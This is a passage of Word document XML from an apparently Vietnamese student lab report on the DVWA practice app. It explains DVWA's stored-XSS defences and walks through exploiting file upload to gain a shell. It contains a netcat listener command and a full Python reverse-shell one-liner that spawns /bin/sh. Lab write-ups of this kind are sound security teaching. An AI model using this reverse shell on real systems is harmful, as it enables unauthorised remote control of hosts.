            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2012:%20XSS%20(Stored).md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#XSS_Stored</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://youtu.be/P1I9UGpGdrU?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Chụp hình minh họa quá trình thực hiện)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1816100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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6172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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="2476500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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6172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color w:val="ff0000"/>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19"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6172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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="2133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12"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6172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4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mở và chạy web trên môi trường của BurpSuite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="2108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5"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6172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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff000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1.3. Tham khảo mã nguồn (view source), giải thích ngắn gọn cách DVWA với security ở mức độ medium, high, impossible ngăn chặn tấn công khai thác lỗi Stored XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr>
          <w:color w:val="202124"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- Medium: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hàm strip_tags loại bỏ các thẻ HTML và PHP ra khỏi chuỗi và sẽ trả về chuỗi đã loại bỏ hết các thẻ HTML và PHP trong </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Hàm str_replace sẽ loại bỏ tất cả &lt;script&gt;trong </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- High: hàm strip_tags loại bỏ các thẻ HTML và PHP ra khỏi chuỗi và sẽ trả về chuỗi đã loại bỏ hết các thẻ HTML và PHP trong </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="202124"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hàm addslashes() thêm một dấu gạch chéo ngược (\) phía trước ký tự đặc biệt: dấu nháy kép, dấu nháy đơn và dấu gạch chéo ngược trong </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:color w:val="202124"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="202124"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.Loại bỏ tất cả các kí tự mà script có và không cho phép chữ T trong https.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="202124"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- Impossible: Hàm htmlspecialchars () được triển khai lọc tất cả các ký tự nguy hiểm từ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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41">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Câu 2: Khai thác lỗi File upload trên DVWA </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firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Tham khảo các tài liệu đính kèm để khai thác lỗi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File upload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">trên DVWA (security ở mức độ low) để chiếm shell của máy chạy DVWA.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#File_Upload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2005:%20File%20Upload.md</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://youtu.be/K7XBQWAZdZ4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Chụp hình minh họa quá trình thực hiện)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào File Upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="2095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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6172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6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo một file php </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5657850" cy="733425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="18"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56578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7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File được tạo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4276725" cy="1514475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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42767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5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tải file lên DVWA </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="2641600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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6172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5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo một cổng để lắng nghe và thực thi từ xa bằng cách chạy lệnh netcat nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4648200" cy="371475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20"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46482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1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi chạy xong ta chạy lệnh để có thể kết nối đến máy mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.10.172",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'</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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1"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6172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6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi chạy xong ta có thể thấy máy thực thi đã có thể kết nối và lắng lắng nghe qua cổng 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6172200" cy="4102100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
